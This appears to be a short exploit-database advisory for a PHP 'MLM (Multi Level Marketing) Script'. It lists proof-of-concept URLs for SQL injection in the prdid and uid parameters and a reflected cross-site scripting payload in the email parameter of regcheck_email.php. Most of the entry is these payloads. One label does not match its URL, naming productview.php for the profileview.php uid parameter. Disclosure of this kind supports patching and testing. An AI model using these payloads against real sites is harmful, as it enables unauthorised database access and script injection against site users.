MLM (Multi Level Marketing) Script - Multiple Vulnerabilities

2013-07-22T00:00:00
ID 1337DAY-ID-21014
Type zdt
Reporter 3spi0n
Modified 2013-07-22T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            [1] SQL Injection Vulnerabilities on Demo Site
 
[+] (productview.php, prdid Param)
>>> http://server/product/version2/productview.php?prdid='1
 
[+] (productview.php, uid param)
>>> http://server/product/version2/profileview.php?uid='1
 
[2] Xss (Cross Site Scripting) Vulnerability on Demo Site
 
[+] (regcheck_email.php, email param)
>>> http://server/product/version2/regcheck_email.php?email=%3Cvideo%3E%3Csource%20onerror%3d%22javascript%3aprompt%28912327%29%22%3E

#  0day.today [2018-03-10]  #